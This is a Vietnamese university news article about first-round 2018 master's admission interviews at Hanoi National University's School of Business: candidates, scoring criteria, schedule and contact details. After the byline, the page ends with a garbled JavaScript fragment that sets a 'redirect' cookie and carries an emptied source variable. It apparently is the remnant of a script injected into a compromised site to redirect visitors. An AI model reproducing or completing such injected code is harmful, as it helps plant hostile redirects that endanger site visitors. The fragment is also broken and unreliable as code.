Phong-van-tuyen-sinh-dot-1Ngày 13/5 vừa qua, Khoa Quản trị và Kinh doanh (HSB) – Đại học Quốc gia Hà Nội đã tổ chức phỏng vấn năng lực đầu vào đối với các ứng viên đăng ký dự tuyển vào các chương trình Thạc sĩ – đợt 1 năm 2018.

Ngày 13/5 vừa qua, Khoa Quản trị và Kinh doanh (HSB) – Đại học Quốc gia Hà Nội đã tổ chức phỏng vấn năng lực đầu vào đối với các ứng viên đăng ký dự tuyển vào các chương trình Thạc sĩ – đợt 1 năm 2018.

Tham gia buổi phỏng vấn có gần 20 ứng viên đến từ nhiều đơn vị, hoạt động trong nhiều lĩnh vực khác nhau, từ cơ quan nhà nước, tổ chức chính trị xã hội đến các doanh nghiệp. Các ứng viên đăng ký dự tuyển một trong các khóa đào tạo của HSB gồm Thạc sĩ Quản trị An ninh Phi truyền thống (MNS), Thạc sĩ Quản trị kinh doanh (HSB-MBA) và Thạc sĩ Khoa học Quản trị Kinh doanh (MBM).

Tại buổi phỏng vấn, mỗi ứng viên có 30 phút trao đổi với Hội đồng để giới thiệu về bản thân, trình bày về mục tiêu học tập cũng như thể hiện năng lực và kinh nghiệm thực tiễn phù hợp với ngành học.

Phong-van-tuyen-sinh-dot-1

Hội đồng phỏng vấn do PGS.TS Nguyễn Ngọc Thắng – Phó chủ nhiệm Khoa làm Chủ tịch. (Ảnh: Khánh Linh)

Chia sẻ ngay sau khi bước ra từ phòng phỏng vấn, ứng viên Phạm Ngọc Hải (hiện đang công tác tại UBND tỉnh Ninh Bình) cho biết: “Tôi đặc biệt ấn tượng với Hội đồng phỏng vấn gồm các giảng viên trẻ giàu kinh nghiệm, trao đổi cởi mở và rất sâu sắc, cũng như công tác tổ chức phỏng vấn tuyển sinh chuyên nghiệp của Khoa Quản trị và Kinh doanh.Tôi rất mong muốn sẽ sớm được học tập chương trình thạc sĩ tại đây để được tiếp cận với những tư duy mới trong quản trị, đem về phục vụ tốt cho công việc của mình.”

Phỏng vấn năng lực đầu vào là một bước trong quy trình đánh giá ứng viên đăng ký tham gia các khóa đào tạo Thạc sĩ tại HSB. Trước đó, các ứng viên đã trải qua bước thẩm định hồ sơ và thi viết luận về các chủ đề liên quan. Đây là phương pháp thi tuyển mới được HSB triển khai từ năm 2017 và nhận được sự đánh giá cao của ĐHQG Hà Nội cũng như các ứng viên.

Phần thi phỏng vấn chiếm 40 trên tổng số 100 điểm đánh giá thí sinh của HSB, trong đó tiêu chí về nhận thức, năng lực, kiến thức chiếm 25 điểm, động cơ, mục đích, nhu cầu học chiếm 10 điểm và kỹ năng giao tiếp, trình bày, sử dụng ngôn ngữ chiếm 5 điểm.

Kết quả phỏng vấn sẽ được công bố sau khoảng 7 đến 10 ngày, các ứng viên đạt tiêu chuẩn sẽ bắt đầu khóa học, thời gian dự kiến trong tháng 6 năm 2018.

Theo kế hoạch, đối với chương trình Thạc sĩ Quản trị An ninh Phi truyền thống và Thạc sĩ Quản trị Kinh doanh do Đại học Quốc gia Hà Nội cấp bằng, phỏng vấn đợt 1 được tổ chức vào các ngày chủ nhật từ 14/4 đến 13/5, đợt 2 dự kiến diễn ra từ 09/9 đến 07/10/2018. Riêng đối với chương trình Thạc sĩ Khoa học Quản trị Kinh doanh do Trường kinh doanh IPAG (Cộng hòa Pháp) cấp bằng, Khoa Quản trị và Kinh doanh sẽ tổ chức tuyển sinh liên tục trong năm.

Ứng viên quan tâm tới các chương trình Thạc sĩ của Khoa Quản trị và Kinh doanh vui lòng liên hệ:
Phòng Tuyển sinh, Khoa Quản trị và Kinh doanh (HSB) – Đại học Quốc gia Hà Nội
Hotline: 024.6292 3030 – 0903.281 028 – 0968.20.22.44
Địa chỉ: nhà B1, số 144 Xuân Thủy, Cầu Giấy, Hà Nội
Điện thoại: (84-24) 3754 84 56 – Fax: (84-24) 3754 84 55
Email: [email protected] – Website: www.hsb.edu.vn
Tham khảo các chương trình đào tạo Thạc sĩ của khoa Quản trị và Kinh doanh (HSB):
1. Chương trình đào tạo Thạc sĩ Quản trị An ninh Phi truyền thống (Master in Management of Non-traditional Security, MNS)
2. Chương trình đào tạo Thạc sĩ Quản trị Kinh doanh (Master in Business Administration, HSB-MBA)
3. Chương trình Thạc sĩ Khoa học Quản trị kinh doanh (MBM)
                                                                                                                                                                 Quang Huy

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}